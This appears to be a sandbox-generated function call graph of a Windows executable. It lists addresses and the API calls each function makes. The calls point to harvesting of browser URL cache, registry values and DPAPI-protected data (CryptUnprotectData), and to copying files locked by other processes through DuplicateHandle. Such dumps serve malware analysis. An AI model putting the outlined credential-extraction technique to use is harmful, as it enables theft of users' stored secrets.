38750->39800 38752 40b792 38753 40b7c2 38752->38753 38754 409c70 2 API calls 38752->38754 39801 40bb98 38753->39801 38756 40b7a5 38754->38756 38758 40b2cc 27 API calls 38756->38758 38762 40b7b2 38758->38762 38759 40b837 CloseHandle 38761 40b83e memset 38759->38761 38760 40b817 38763 409a45 3 API calls 38760->38763 39834 40a6e6 WideCharToMultiByte 38761->39834 38765 409d1f 6 API calls 38762->38765 38766 40b827 CopyFileW 38763->38766 38765->38753 38766->38761 38767 40b866 38768 444432 121 API calls 38767->38768 38770 40b879 38768->38770 38769 40bad5 38772 40baeb 38769->38772 38773 40bade DeleteFileW 38769->38773 38770->38769 38771 40b273 27 API calls 38770->38771 38774 40b89a 38771->38774 38775 40b04b ??3@YAXPAX 38772->38775 38773->38772 38776 438552 134 API calls 38774->38776 38777 40baf3 38775->38777 38778 40b8a4 38776->38778 38777->38330 38779 40bacd 38778->38779 38781 4251c4 137 API calls 38778->38781 38780 443d90 111 API calls 38779->38780 38780->38769 38804 40b8b8 38781->38804 38782 40bac6 39844 424f26 123 API calls 38782->39844 38783 40b8bd memset 39835 425413 17 API calls 38783->39835 38786 425413 17 API calls 38786->38804 38789 40a71b MultiByteToWideChar 38789->38804 38790 40a734 MultiByteToWideChar 38790->38804 38793 40b9b5 memcmp 38793->38804 38794 4099c6 2 API calls 38794->38804 38795 404423 38 API calls 38795->38804 38798 40bb3e memset memcpy 39845 40a734 MultiByteToWideChar 38798->39845 38799 4251c4 137 API calls 38799->38804 38801 40bb88 LocalFree 38801->38804 38804->38782 38804->38783 38804->38786 38804->38789 38804->38790 38804->38793 38804->38794 38804->38795 38804->38798 38804->38799 38805 40ba5f memcmp 38804->38805 39836 4253ef 16 API calls 38804->39836 39837 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38804->39837 39838 4253af 17 API calls 38804->39838 39839 4253cf 17 API calls 38804->39839 39840 447280 memset 38804->39840 39841 447960 memset memcpy memcpy memcpy 38804->39841 39842 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38804->39842 39843 447920 memcpy memcpy memcpy 38804->39843 38805->38804 38806->38332 38808 40aed1 38807->38808 38809 40aec7 FindClose 38807->38809 38808->38264 38809->38808 38811 4099d7 38810->38811 38812 4099da memcpy 38810->38812 38811->38812 38812->38315 38814 40b2cc 27 API calls 38813->38814 38815 44543f 38814->38815 38816 409d1f 6 API calls 38815->38816 38817 44544f 38816->38817 39929 409b98 GetFileAttributesW 38817->39929 38819 44545e 38820 445476 38819->38820 38821 40b6ef 253 API calls 38819->38821 38822 40b2cc 27 API calls 38820->38822 38821->38820 38823 445482 38822->38823 38824 409d1f 6 API calls 38823->38824 38825 445492 38824->38825 39930 409b98 GetFileAttributesW 38825->39930 38827 4454a1 38828 4454b9 38827->38828 38829 40b6ef 253 API calls 38827->38829 38828->38345 38829->38828 38830->38344 38831->38361 38832->38367 38833->38404 38834->38381 38835->38431 38836->38431 38837->38412 38838->38442 38839->38444 38840->38446 38842 414c2e 17 API calls 38841->38842 38843 40c2ae 38842->38843 38913 40c1d3 38843->38913 38848 40c3be 38865 40a8ab 38848->38865 38849 40afcf 2 API calls 38850 40c2fd FindFirstUrlCacheEntryW 38849->38850 38851 40c3b6 38850->38851 38852 40c31e wcschr 38850->38852 38853 40b04b ??3@YAXPAX 38851->38853 38854 40c331 38852->38854 38855 40c35e FindNextUrlCacheEntryW 38852->38855 38853->38848 38857 40a8ab 9 API calls 38854->38857 38855->38852 38856 40c373 GetLastError 38855->38856 38858 40c3ad FindCloseUrlCache 38856->38858 38859 40c37e 38856->38859 38860 40c33e wcschr 38857->38860 38858->38851 38861 40afcf 2 API calls 38859->38861 38860->38855 38862 40c34f 38860->38862 38863 40c391 FindNextUrlCacheEntryW 38861->38863 38864 40a8ab 9 API calls 38862->38864 38863->38852 38863->38858 38864->38855 39122 40a97a 38865->39122 38868 40a8cc 38868->38453 38869 40a8d0 7 API calls 38869->38868 39127 40b1ab free free 38870->39127 38872 40c3dd 38873 40b2cc 27 API calls 38872->38873 38874 40c3e7 38873->38874 39128 414592 RegOpenKeyExW 38874->39128 38876 40c3f4 38877 40c50e 38876->38877 38878 40c3ff 38876->38878 38892 405337 38877->38892 38879 40a9ce 4 API calls 38878->38879 38880 40c418 memset 38879->38880 39129 40aa1d 38880->39129 38883 40c471 38885 40c47a _wcsupr 38883->38885 38884 40c505 RegCloseKey 38884->38877 38886 40a8d0 7 API calls 38885->38886 38887 40c498 38886->38887 38888 40a8d0 7 API calls 38887->38888 38889 40c4ac memset 38888->38889 38890 40aa1d 38889->38890 38891 40c4e4 RegEnumValueW 38890->38891 38891->38884 38891->38885 39131 405220 38892->39131 38896 4099c6 2 API calls 38895->38896 38897 40a714 _wcslwr 38896->38897 38898 40c634 38897->38898 39188 405361 38898->39188 38901 40c65c wcslen 39191 4053b6 39 API calls 38901->39191 38902 40c71d wcslen 38902->38462 38904 40c677 38905 40c713 38904->38905 39192 40538b 39 API calls 38904->39192 39194 4053df 39 API calls 38905->39194 38908 40c6a5 38908->38905 38909 40c6a9 memset 38908->38909 38910 40c6d3 38909->38910 39193 40c589 44 API calls 38910->39193 38912->38460 38914 40ae18 9 API calls 38913->38914 38920 40c210 38914->38920 38915 40ae51 9 API calls 38915->38920 38916 40c264 38917 40aebe FindClose 38916->38917 38919 40c26f 38917->38919 38918 40add4 2 API calls 38918->38920 38925 40e5ed memset memset 38919->38925 38920->38915 38920->38916 38920->38918 38921 40c231 _wcsicmp 38920->38921 38922 40c1d3 35 API calls 38920->38922 38921->38920 38923 40c248 38921->38923 38922->38920 38938 40c084 22 API calls 38923->38938 38926 414c2e 17 API calls 38925->38926 38927 40e63f 38926->38927 38928 409d1f 6 API calls 38927->38928 38929 40e658 38928->38929 38939 409b98 GetFileAttributesW 38929->38939 38931 40e667 38932 40e680 38931->38932 38933 409d1f 6 API calls 38931->38933 38940 409b98 GetFileAttributesW 38932->38940 38933->38932 38935 40e68f 38936 40c2d8 38935->38936 38941 40e4b2 38935->38941 38936->38848 38936->38849 38938->38920 38939->38931 38940->38935 38962 40e01e 38941->38962 38943 40e593 38944 40e5b0 38943->38944 38945 40e59c DeleteFileW 38943->38945 38946 40b04b ??3@YAXPAX 38944->38946 38945->38944 38948 40e5bb 38946->38948 38947 40e521 38947->38943 38985 40e175 38947->38985 38950 40e5c4 CloseHandle 38948->38950 38951 40e5cc 38948->38951 38950->38951 38953 40b633 free 38951->38953 38952 40e573 38954 40e584 38952->38954 38955 40e57c CloseHandle 38952->38955 38956 40e5db 38953->38956 39028 40b1ab free free 38954->39028 38955->38954 38958 40b633 free 38956->38958 38959 40e5e3 38958->38959 38959->38936 38961 40e540 38961->38952 39005 40e2ab 38961->39005 39029 406214 38962->39029 38965 40e16b 38965->38947 38968 40afcf 2 API calls 38969 40e08d OpenProcess 38968->38969 38970 40e0a4 GetCurrentProcess DuplicateHandle 38969->38970 38974 40e152 38969->38974 38971 40e0d0 GetFileSize 38970->38971 38972 40e14a CloseHandle 38970->38972 39065 409a45 GetTempPathW 38971->39065 38972->38974 38973 40e160 38977 40b04b ??3@YAXPAX 38973->38977 38974->38973 38976 406214 22 API calls 38974->38976 38976->38973 38977->38965 38978 40e0ea 39068 4096dc CreateFileW 38978->39068 38980 40e0f1 CreateFileMappingW 38981 40e140 CloseHandle CloseHandle 38980->38981 38982 40e10b MapViewOfFile 38980->38982 38981->38972 38983 40e13b CloseHandle 38982->38983 38984 40e11f WriteFile UnmapViewOfFile 38982->38984 38983->38981 38984->38983 38986 40e18c 38985->38986 39069 406b90 38986->39069 38989 40e1a7 memset 38995 40e1e8 38989->38995 38990 40e299 39101 4069a3 38990->39101 38996 40e283 38995->38996 38997 40dd50 _wcsicmp 38995->38997 39003 40e244 _snwprintf 38995->39003 39079 406e8f 38995->39079 39108 40742e 8 API calls 38995->39108 39109 40aae3 wcslen wcslen _memicmp 38995->39109 39110 406b53 SetFilePointerEx ReadFile 38995->39110 38998 40e291 38996->38998 38999 40e288 free 38996->38999 38997->38995 39000 40aa04 free 38998->39000 38999->38998 39000->38990 39004 40a8d0 7 API calls 39003->39004 39004->38995 39006 40e2c2 39005->39006 39007 406b90 11 API calls 39006->39007 39008 40e2d3 39007->39008 39009 40e4a0 39008->39009 39011 406e8f 13 API calls 39008->39011 39014 40e489 39008->39014 39017 40dd50 _wcsicmp 39008->39017 39023 40e3e0 memcpy 39008->39023 39024 40e3fb memcpy 39008->39024 39025 40e3b3 wcschr 39008->39025 39026 40e416 memcpy 39008->39026 39027 40e431 memcpy 39008->39027 39111 40dd50 _wcsicmp 39008->39111 39120 40742e 8 API calls 39008->39120 39121 406b53 SetFilePointerEx ReadFile 39008->39121 39010 4069a3 2 API calls 39009->39010 39012 40e4ab 39010->39012 39011->39008 39012->38961 39015 40aa04 free 39014->39015 39016 40e491 39015->39016 39016->39009 39018 40e497 free 39016->39018 39017->39008 39018->39009 39020 40e376 memset 39112 40aa29 39020->39112 39023->39008 39024->39008 39025->39008 39026->39008 39027->39008 39028->38943 39030 406294 CloseHandle 39029->39030 39031 406224 39030->39031 39032 4096c3 CreateFileW 39031->39032 39033 40622d 39032->39033 39034 406281 GetLastError 39033->39034 39035 40a2ef ReadFile 39033->39035 39037 40625a 39034->39037 39036 406244 39035->39036 39036->39034 39038 40624b 39036->39038 39037->38965 39040 40dd85 memset 39037->39040 39038->39037 39039 406777 19 API calls 39038->39039 39039->39037 39041 409bca GetModuleFileNameW 39040->39041 39042 40ddbe CreateFileW 39041->39042 39045 40ddf1 39042->39045 39043 40afcf ??2@YAPAXI ??3@YAXPAX 39043->39045 39044 41352f 9 API calls 39044->39045 39045->39043 39045->39044 39046 40de0b NtQuerySystemInformation 39045->39046 39047 40de3b CloseHandle GetCurrentProcessId 39045->39047 39046->39045 39048 40de54 39047->39048 39049 413d4c 46 API calls 39048->39049 39058 40de88 39049->39058 39050 40e00c 39051 413d29 free FreeLibrary 39050->39051 39052 40e014 39051->39052 39052->38965 39052->38968 39053 40dea9 _wcsicmp 39054 40dee7 OpenProcess 39053->39054 39055 40debd _wcsicmp 39053->39055 39054->39058 39055->39054 39056 40ded0 _wcsicmp 39055->39056 39056->39054 39056->39058 39057 40dfef CloseHandle 39057->39058 39058->39050 39058->39053 39058->39057 39059 40df23 GetCurrentProcess DuplicateHandle 39058->39059 39062 40df8f CloseHandle 39058->39062 39063 40df78 39058->39063 39059->39058 39060 40df4c memset 39059->39060 39061 41352f 9 API calls 39060->39061 39061->39058 39062->39063 39063->39057 39063->39062 39064 40dfae _wcsicmp 39063->39064 39064->39058 39064->39063 39066 409a74 GetTempFileNameW 39065->39066 39067 409a66 GetWindowsDirectoryW 39065->39067 39066->38978 39067->39066 39068->38980 39070 406bd5 39069->39070 39071 406bad 39069->39071 39073 4066bf free malloc memcpy free free 39070->39073 39078 406c0f 39070->39078 39071->39070 39072 406bba _wcsicmp 39071->39072 39072->39070 39072->39071 39074 406be5 39073->39074 39075 40afcf ??2@YAPAXI ??3@YAXPAX 39074->39075 39074->39078 39076 406bff 39075->39076 39077 4068bf SetFilePointerEx memcpy ReadFile ??2@YAPAXI ??3@YAXPAX 39076->39077 39077->39078 39078->38989 39078->38990 39081 406ed1 39079->39081 39080 407424 39080->38995 39081->39080 39082 40b633 free 39081->39082 39083 406f4e 39082->39083 39084 406f73 memset 39083->39084 39085 4070d4 39083->39085 39087 407080 free 39083->39087 39088 4099f4 malloc memcpy free 39083->39088 39090 4069df memcpy 39083->39090 39092 406a10 memcpy 39083->39092 39093 406aa2 memcpy 39083->39093 39084->39083 39085->39080 39086 40718b 39085->39086 39091 4069df memcpy 39085->39091 39095 40717b 39085->39095 39089 4069df memcpy 39086->39089 39099 40730b 39086->39099 39087->39083 39088->39083 39100 4071f1 39089->39100 39090->39083 39091->39085 39092->39083 39093->39083 39094 4069df memcpy 39094->39100 39096 4069df memcpy 39095->39096 39096->39086 39097 406c5a 6 API calls 39097->39099 39098 406c28 ??2@YAPAXI ??3@YAXPAX 39098->39099 39099->39080 39099->39097 39099->39098 39100->39094 39100->39099 39102 4069c4 ??3@YAXPAX 39101->39102 39103 4069af 39102->39103 39104 40b633 free 39103->39104 39105 4069ba 39104->39105 39106 40b04b ??3@YAXPAX 39105->39106 39107 4069c2 39106->39107 39107->38961 39108->38995 39109->38995 39110->38995 39111->39020 39113 40aa33 39112->39113 39114 40aa63 39112->39114 39115 40aa44 39113->39115 39116 40aa38 wcslen 39113->39116 39114->39008 39117 40a9ce malloc memcpy free free 39115->39117 39116->39115 39118 40aa4d 39117->39118 39118->39114 39119 40aa51 memcpy 39118->39119 39119->39114 39120->39008 39121->39008 39126 40a980 39122->39126 39123 40a8bb 39123->38868 39123->38869 39124 40a995 _wcsicmp 39124->39126 39125 40a99c wcscmp 39125->39126 39126->39123 39126->39124 39126->39125 39127->38872 39128->38876 39130 40aa23 RegEnumValueW 39129->39130 39130->38883 39130->38884 39132 405335 39131->39132 39133 40522a 39131->39133 39132->38462 39134 40b2cc 27 API calls 39133->39134 39135 405234 39134->39135 39136 40a804 8 API calls 39135->39136 39137 40523a 39136->39137 39176 40b273 39137->39176 39139 405248 _mbscpy _mbscat GetProcAddress 39140 40b273 27 API calls 39139->39140 39141 405279 39140->39141 39179 405211 GetProcAddress 39141->39179 39143 405282 39144 40b273 27 API calls 39143->39144 39145 40528f 39144->39145 39180 405211 GetProcAddress 39145->39180 39147 405298 39148 40b273 27 API calls 39147->39148 39149 4052a5 39148->39149 39181 405211 GetProcAddress 39149->39181 39151 4052ae 39152 40b273 27 API calls 39151->39152 39153 4052bb 39152->39153 39182 405211 GetProcAddress 39153->39182 39155 4052c4 39156 40b273 27 API calls 39155->39156 39157 4052d1 39156->39157 39183 405211 GetProcAddress 39157->39183 39159 4052da 39160 40b273 27 API calls 39159->39160 39161 4052e7 39160->39161 39184 405211 GetProcAddress 39161->39184 39163 4052f0 39164 40b273 27 API calls 39163->39164 39165 4052fd 39164->39165 39177 40b58d 27 API calls 39176->39177 39178 40b18c 39177->39178 39178->39139 39179->39143 39180->39147 39181->39151 39182->39155 39183->39159 39184->39163 39189 405220 39 API calls 39188->39189 39190 405369 39189->39190 39190->38901 39190->38902 39191->38904 39192->38908 39193->38905 39194->38902 39196 40440c FreeLibrary 39195->39196 39197 40436d 39196->39197 39198 40a804 8 API calls 39197->39198 39199 404377 39198->39199 39200 404383 39199->39200 39201 404405 39199->39201 39202 40b273 27 API calls 39200->39202 39201->38472 39201->38473 39201->38474 39203 40438d GetProcAddress 39202->39203 39204 40b273 27 API calls 39203->39204 39205 4043a7 GetProcAddress 39204->39205 39206 40b273 27 API calls 39205->39206 39207 4043ba GetProcAddress 39206->39207 39208 40b273 27 API calls 39207->39208 39209 4043ce GetProcAddress 39208->39209 39210 40b273 27 API calls 39209->39210 39211 4043e2 GetProcAddress 39210->39211 39212 4043f1 39211->39212 39213 4043f7 39212->39213 39214 40440c FreeLibrary 39212->39214 39213->39201 39214->39201 39216 404413 FreeLibrary 39215->39216 39217 40441e 39215->39217 39216->39217 39217->38490 39218->38487 39220 40447e 39219->39220 39221 40442e 39219->39221 39222 404485 CryptUnprotectData 39220->39222 39223 40449c 39220->39223 39224 40b2cc 27 API calls 39221->39224 39222->39223 39223->38487 39225 404438 39224->39225 39226 40a804 8 API calls 39225->39226 39227 40443e 39226->39227 39228 404445 39227->39228 39229 404467 39227->39229 39230 40b273 27 API calls 39228->39230 39229->39220 39232 404475 FreeLibrary 39229->39232 39231 40444f GetProcAddress 39230->39231 39231->39229 39233 404460 39231->39233 39232->39220 39233->39229 39235 4135f6 39234->39235 39236 4135eb FreeLibrary 39234->39236 39235->38493 39236->39235 39238 4449c4 39237->39238 39239 444a52 39237->39239 39240 40b2cc 27 API calls 39238->39240 39239->38510 39239->38511 39241 4449cb 39240->39241 39242 40a804 8 API calls 39241->39242 39243 4449d1 39242->39243 39244 40b273 27 API calls 39243->39244 39245 4449dc GetProcAddress 39244->39245 39246 40b273 27 API calls 39245->39246 39258->38521 39259->38521 39260->38521 39261->38521 39262->38512 39264 403a29 39263->39264 39278 403bed memset memset 39264->39278 39266 403ae7 39291 40b1ab free free 39266->39291 39267 403a3f memset 39270 403a2f 39267->39270 39269 403aef 39269->38528 39270->39266 39270->39267 39271 409d1f 6 API calls 39270->39271 39272 409b98 GetFileAttributesW 39270->39272 39273 40a8d0 7 API calls 39270->39273 39271->39270 39272->39270 39273->39270 39275 40a051 GetFileTime CloseHandle 39274->39275 39276 4039ca CompareFileTime 39274->39276 39275->39276 39276->38528 39277->38527 39279 414c2e 17 API calls 39278->39279 39280 403c38 39279->39280 39281 409719 2 API calls 39280->39281 39282 403c3f wcscat 39281->39282 39283 414c2e 17 API calls 39282->39283 39284 403c61 39283->39284 39285 409719 2 API calls 39284->39285 39286 403c68 wcscat 39285->39286 39292 403af5 39286->39292 39289 403af5 20 API calls 39290 403c95 39289->39290 39290->39270 39291->39269 39293 403b02 39292->39293 39294 40ae18 9 API calls 39293->39294 39300 403b37 39294->39300 39295 403bdb 39296 40aebe FindClose 39295->39296 39297 403be6 39296->39297 39297->39289 39298 40ae18 9 API calls 39298->39300 39299 40ae51 9 API calls 39299->39300 39300->39295 39300->39298 39300->39299 39301 40add4 wcscmp wcscmp 39300->39301 39302 40aebe FindClose 39300->39302 39303 40a8d0 7 API calls 39300->39303 39301->39300 39302->39300 39303->39300 39305 409d1f 6 API calls 39304->39305 39306 404190 39305->39306 39319 409b98 GetFileAttributesW 39306->39319 39308 40419c 39309 4041a7 6 API calls 39308->39309 39310 40435c 39308->39310 39311 40424f 39309->39311 39310->38553 39311->39310 39313 40425e memset 39311->39313 39315 409d1f 6 API calls 39311->39315 39316 40a8ab 9 API calls 39311->39316 39320 414842 39311->39320 39313->39311 39314 404296 wcscpy 39313->39314 39314->39311 39315->39311 39317 4042b6 memset memset _snwprintf wcscpy 39316->39317 39317->39311 39318->38554 39319->39308 39323 41443e 39320->39323 39322 414866 39322->39311 39324 41444b 39323->39324 39325 414451 39324->39325 39326 4144a3 GetPrivateProfileStringW 39324->39326 39327 414491 39325->39327 39328 414455 wcschr 39325->39328 39326->39322 39330 414495 WritePrivateProfileStringW 39327->39330 39328->39327 39329 414463 _snwprintf 39328->39329 39329->39330 39330->39322 39331->38559 39333 40b2cc 27 API calls 39332->39333 39334 409615 39333->39334 39335 409d1f 6 API calls 39334->39335 39336 409625 39335->39336 39361 409b98 GetFileAttributesW 39336->39361 39338 409634 39339 409648 39338->39339 39362 4091b8 memset 39338->39362 39341 40b2cc 27 API calls 39339->39341 39344 408801 39339->39344 39342 40965d 39341->39342 39343 409d1f 6 API calls 39342->39343 39345 40966d 39343->39345 39344->38562 39344->38589 39414 409b98 GetFileAttributesW 39345->39414 39347 40967c 39347->39344 39348 409681 39347->39348 39415 409529 72 API calls 39348->39415 39350 409690 39350->39344 39361->39338 39416 40a6e6 WideCharToMultiByte 39362->39416 39364 409202 39417 444432 39364->39417 39367 40b273 27 API calls 39368 409236 39367->39368 39463 438552 39368->39463 39394 40951d 39394->39339 39414->39347 39415->39350 39416->39364 39418 4438b5 11 API calls 39417->39418 39419 44444c 39418->39419 39420 409215 39419->39420 39513 415a6d 39419->39513 39420->39367 39420->39394 39422 4442e6 11 API calls 39424 44469e 39422->39424 39423 444486 39425 4444b9 memcpy 39423->39425 39462 4444a4 39423->39462 39424->39420 39427 443d90 111 API calls 39424->39427 39517 415258 39425->39517 39427->39420 39428 444524 39429 444541 39428->39429 39430 44452a 39428->39430 39462->39422 39634 438460 39463->39634 39514 415a77 39513->39514 39515 415a8d 39514->39515 39516 415a7e memset 39514->39516 39515->39423 39516->39515 39518 4438b5 11 API calls 39517->39518 39519 41525d 39518->39519 39519->39428 39646 41703f 39634->39646 39636 43847a 39637 43848a 39636->39637 39638 43847e 39636->39638 39647 417044 39646->39647 39648 41705c 39646->39648 39650 416760 11 API calls 39647->39650 39652 417055 39647->39652 39649 417075 39648->39649 39651 41707a 11 API calls 39648->39651 39649->39636 39650->39652 39651->39647 39652->39636 39784 413f4f 39757->39784 39760 413f37 K32GetModuleFileNameExW 39761 413f4a 39760->39761 39761->38622 39763 413969 wcscpy 39762->39763 39764 41396c wcschr 39762->39764 39774 413a3a 39763->39774 39764->39763 39766 41398e 39764->39766 39789 4097f7 wcslen wcslen _memicmp 39766->39789 39768 41399a 39769 4139a4 memset 39768->39769 39770 4139e6 39768->39770 39790 409dd5 GetWindowsDirectoryW wcscpy 39769->39790 39772 413a31 wcscpy 39770->39772 39773 4139ec memset 39770->39773 39772->39774 39791 409dd5 GetWindowsDirectoryW wcscpy 39773->39791 39774->38622 39775 4139c9 wcscpy wcscat 39775->39774 39777 413a11 memcpy wcscat 39777->39774 39779 413cb0 GetModuleHandleW 39778->39779 39780 413cda 39778->39780 39779->39780 39781 413cbf GetProcAddress 39779->39781 39782 413ce3 GetProcessTimes 39780->39782 39783 413cf6 39780->39783 39781->39780 39782->38624 39783->38624 39785 413f2f 39784->39785 39786 413f54 39784->39786 39785->39760 39785->39761 39787 40a804 8 API calls 39786->39787 39788 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39787->39788 39788->39785 39789->39768 39790->39775 39791->39777 39792->38644 39793->38667 39795 409cf9 GetVersionExW 39794->39795 39796 409d0a 39794->39796 39795->39796 39796->38674 39796->38679 39797->38680 39798->38684 39799->38686 39800->38752 39802 40bba5 39801->39802 39846 40cc26 39802->39846 39805 40bd4b 39867 40cc0c 39805->39867 39810 40b2cc 27 API calls 39811 40bbef 39810->39811 39874 40ccf0 _wcsicmp 39811->39874 39813 40bbf5 39813->39805 39875 40ccb4 6 API calls 39813->39875 39815 40bc26 39816 40cf04 17 API calls 39815->39816 39817 40bc2e 39816->39817 39818 40bd43 39817->39818 39820 40b2cc 27 API calls 39817->39820 39819 40cc0c 4 API calls 39818->39819 39819->39805 39821 40bc40 39820->39821 39876 40ccf0 _wcsicmp 39821->39876 39823 40bc46 39823->39818 39824 40bc61 memset memset WideCharToMultiByte 39823->39824 39877 40103c strlen 39824->39877 39826 40bcc0 39827 40b273 27 API calls 39826->39827 39828 40bcd0 memcmp 39827->39828 39828->39818 39829 40bce2 39828->39829 39830 404423 38 API calls 39829->39830 39831 40bd10 39830->39831 39831->39818 39832 40bd3a LocalFree 39831->39832 39833 40bd1f memcpy 39831->39833 39832->39818 39833->39832 39834->38767 39835->38804 39836->38804 39837->38804 39838->38804 39839->38804 39840->38804 39841->38804 39842->38804 39843->38804 39844->38779 39845->38801 39878 4096c3 CreateFileW 39846->39878 39848 40cc34 39849 40cc3d GetFileSize 39848->39849 39857 40bbca 39848->39857 39850 40afcf 2 API calls 39849->39850 39851 40cc64 39850->39851 39879 40a2ef ReadFile 39851->39879 39853 40cc71 39880 40ab4a MultiByteToWideChar 39853->39880 39855 40cc95 CloseHandle 39856 40b04b ??3@YAXPAX 39855->39856 39856->39857 39857->39805 39858 40cf04 39857->39858 39859 40b633 free 39858->39859 39860 40cf14 39859->39860 39886 40b1ab free free 39860->39886 39862 40cf1b 39863 40bbdd 39862->39863 39865 40cfef 39862->39865 39887 40cd4b 39862->39887 39863->39805 39863->39810 39866 40cd4b 14 API calls 39865->39866 39866->39863 39868 40b633 free 39867->39868 39869 40cc15 39868->39869 39870 40aa04 free 39869->39870 39871 40cc1d 39870->39871 39928 40b1ab free free 39871->39928 39873 40b7d4 memset CreateFileW 39873->38759 39873->38760 39874->39813 39875->39815 39876->39823 39877->39826 39878->39848 39879->39853 39881 40ab93 39880->39881 39882 40ab6b 39880->39882 39881->39855 39883 40a9ce 4 API calls 39882->39883 39884 40ab74 39883->39884 39885 40ab7c MultiByteToWideChar 39884->39885 39885->39881 39886->39862 39888 40cd7b 39887->39888 39889 40aa29 6 API calls 39888->39889 39893 40cd89 39889->39893 39890 40cef5 39891 40aa04 free 39890->39891 39892 40cefd 39891->39892 39892->39862 39893->39890 39894 40aa29 6 API calls 39893->39894 39895 40ce1d 39894->39895 39896 40aa29 6 API calls 39895->39896 39897 40ce3e 39896->39897 39898 40ce6a 39897->39898 39921 40abb7 wcslen memmove 39897->39921 39899 40ce9f 39898->39899 39924 40abb7 wcslen memmove 39898->39924 39902 40a8d0 7 API calls 39899->39902 39905 40ceb5 39902->39905 39903 40ce56 39922 40aa71 wcslen 39903->39922 39904 40ce8b 39925 40aa71 wcslen 39904->39925 39911 40a8d0 7 API calls 39905->39911 39908 40ce5e 39923 40abb7 wcslen memmove 39908->39923 39909 40ce93 39926 40abb7 wcslen memmove 39909->39926 39912 40cecb 39911->39912 39927 40d00b malloc memcpy free free 39912->39927 39915 40cedd 39916 40aa04 free 39915->39916 39917 40cee5 39916->39917 39918 40aa04 free 39917->39918 39919 40ceed 39918->39919 39920 40aa04 free 39919->39920 39920->39890 39921->39903 39922->39908 39923->39898 39924->39904 39925->39909 39926->39899 39927->39915 39928->39873 39929->38819 39930->38827 39931 4147f3 39934 414561 39931->39934 39933 414813 39935 41456d 39934->39935 39936 41457f GetPrivateProfileIntW 39934->39936 39939 4143f1 memset _itow WritePrivateProfileStringW 39935->39939 39936->39933 39938 41457a 39938->39933 39939->39938 39940 44def7 39941 44df07 39940->39941 39942 44df00 ??3@YAXPAX 39940->39942 39943 44df17 39941->39943 39944 44df10 ??3@YAXPAX 39941->39944 39942->39941 39945 44df27 39943->39945 39946 44df20 ??3@YAXPAX 39943->39946 39944->39943 39947 44df37 39945->39947 39948 44df30 ??3@YAXPAX 39945->39948 39946->39945 39948->39947 39949 4148b6 FindResourceW 39950 4148cf SizeofResource 39949->39950 39953 4148f9 39949->39953 39951 4148e0 LoadResource 39950->39951 39950->39953 39952 4148ee LockResource 39951->39952 39951->39953 39952->39953 39954 441b3f 39964 43a9f6 39954->39964 39956 441b61 40137 4386af memset 39956->40137 39958 44189a 39959 442bd4 39958->39959 39960 4418e2 39958->39960 39961 4418ea 39959->39961 40139 441409 memset 39959->40139 39960->39961 40138 4414a9 12 API calls 39960->40138 39965 43aa20 39964->39965 39966 43aadf 39964->39966 39965->39966 39967 43aa34 memset 39965->39967 39966->39956 39968 43aa56 39967->39968 39969 43aa4d 39967->39969 40140 43a6e7 39968->40140 40148 42c02e memset 39969->40148 39974 43aad3 40150 4169a7 11 API calls 39974->40150 39975 43aaae 39975->39966 39975->39974 39990 43aae5 39975->39990 39977 43ac18 39979 43ac47 39977->39979 40152 42bbd5 memcpy memcpy memcpy memset memcpy 39977->40152 39980 43aca8 39979->39980 40153 438eed 16 API calls 39979->40153 39984 43acd5 39980->39984 40155 4233ae 11 API calls 39980->40155 39983 43ac87 40154 4233c5 16 API calls 39983->40154 40156 423426 11 API calls 39984->40156 39988 43ace1 40157 439811 164 API calls 39988->40157 39989 43a9f6 162 API calls 39989->39990 39990->39966 39990->39977 39990->39989 40151 439bbb 22 API calls 39990->40151 39992 43acfd 39997 43ad2c 39992->39997 40158 438eed 16 API calls 39992->40158 39994 43ad19 40159 4233c5 16 API calls 39994->40159 39996 43ad58 40160 44081d 164 API calls 39996->40160 39997->39996 40000 43add9 39997->40000 40164 423426 11 API calls 40000->40164 40001 43ae3a memset 40002 43ae73 40001->40002 40165 42e1c0 148 API calls 40002->40165 40003 43adab 40162 438c4e 164 API calls 40003->40162 40004 43ad6c 40004->39966 40004->40003 40161 42370b memset memcpy memset 40004->40161 40008 43adcc 40163 440f84 12 API calls 40008->40163 40009 43ae96 40166 42e1c0 148 API calls 40009->40166 40012 43aea8 40014 43aec1 40012->40014 40167 42e199 148 API calls 40012->40167 40013 43add4 40021 43b60f 40013->40021 40227 438f86 16 API calls 40013->40227 40016 43af00 40014->40016 40168 42e1c0 148 API calls 40014->40168 40016->39966 40019 43af1a 40016->40019 40020 43b3d9 40016->40020 40169 438eed 16 API calls 40019->40169 40025 43b3f6 40020->40025 40031 43b4c8 40020->40031 40021->39966 40228 4393a5 17 API calls 40021->40228 40024 43af2f 40170 4233c5 16 API calls 40024->40170 40210 432878 12 API calls 40025->40210 40027 43af51 40171 423426 11 API calls 40027->40171 40029 43af7d 40172 423426 11 API calls 40029->40172 40030 43b4f2 40217 43a76c 21 API calls 40030->40217 40031->40030 40216 42bbd5 memcpy memcpy memcpy memset memcpy 40031->40216 40036 43b529 40218 44081d 164 API calls 40036->40218 40037 43b462 40212 423330 11 API calls 40037->40212 40038 43af94 40173 423330 11 API calls 40038->40173 40042 43b544 40046 43b55c 40042->40046 40219 42c02e memset 40042->40219 40043 43b428 40043->40037 40211 432b60 16 API calls 40043->40211 40044 43afca 40174 423330 11 API calls 40044->40174 40045 43b47e 40048 43b497 40045->40048 40213 42374a memcpy memset memcpy memcpy memcpy 40045->40213 40220 43a87a 164 API calls 40046->40220 40214 4233ae 11 API calls 40048->40214 40051 43afdb 40175 4233ae 11 API calls 40051->40175 40054 43b4b1 40215 423399 11 API calls 40054->40215 40056 43b56c 40059 43b58a 40056->40059 40221 423330 11 API calls 40056->40221 40058 43afee 40176 44081d 164 API calls 40058->40176 40222 440f84 12 API calls 40059->40222 40060 43b4c1 40224 42db80 164 API calls 40060->40224 40064 43b592 40223 43a82f 16 API calls 40064->40223 40068 43b5b4 40225 438c4e 164 API calls 40068->40225 40070 43b5cf 40226 42c02e memset 40070->40226 40072 43b005 40072->39966 40083 43b01f 40072->40083 40177 42d836 164 API calls 40072->40177 40073 43b1ef 40187 4233c5 16 API calls 40073->40187 40075 43b212 40188 423330 11 API calls 40075->40188 40078 43b087 40178 4233ae 11 API calls 40078->40178 40081 43b22a 40189 42ccb5 11 API calls 40081->40189 40083->40073 40185 423330 11 API calls 40083->40185 40186 42d71d 164 API calls 40083->40186 40085 43b23f 40190 4233ae 11 API calls 40085->40190 40086 